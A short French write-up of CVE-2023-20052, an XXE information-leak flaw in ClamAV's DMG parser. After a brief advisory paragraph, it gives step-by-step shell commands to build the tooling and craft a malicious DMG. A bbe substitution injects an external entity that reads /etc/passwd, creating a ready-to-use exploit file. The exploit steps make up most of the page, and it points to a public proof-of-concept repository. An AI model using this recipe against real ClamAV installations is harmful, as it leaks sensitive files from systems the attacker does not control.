
CVE-2023-20052 vulnérabilité de fuite d'informations dans l'analyseur de fichiers DMG de ClamAV
Vulnérabilité de fuite d'informations CVE-2023-20052 dans l'analyseur de fichiers DMG de ClamAV
Une vulnérabilité dans l'analyseur de fichiers DMG de ClamAV versions 1.0.0 et antérieures, 0.105.1 et antérieures, et 0.103.7 et antérieures pourrait permettre à un attaquant distant non authentifié d'accéder à des informations sensibles sur un appareil affecté. Cette vulnérabilité est due à l'activation de la substitution d'entités XML pouvant entraîner une injection d'entité externe XML. Un attaquant pourrait exploiter cette vulnérabilité en soumettant un fichier DMG conçu pour être analysé par ClamAV sur un appareil affecté. Une exploitation réussie pourrait permettre à l'attaquant de divulguer des octets de tout fichier pouvant être lu par le processus d'analyse de ClamAV.
sudo dpkg -i package-name.deb

sudo apt install -f
mkdir /usr/local/share/clamav
mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf

sudo adduser clamav

sudo chown -R 1002:1003 /usr/local/share/clamav
sudo freshclam



apt-get update
apt-get install -y ca-certificates gnupg wget
echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list
wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -
apt-get update -y
sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus

cd /libdmg-hfsplus
cmake .

make

cp dmg/dmg /bin
sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg


Référence : https://github.com/nokn0wthing/CVE-2023-20052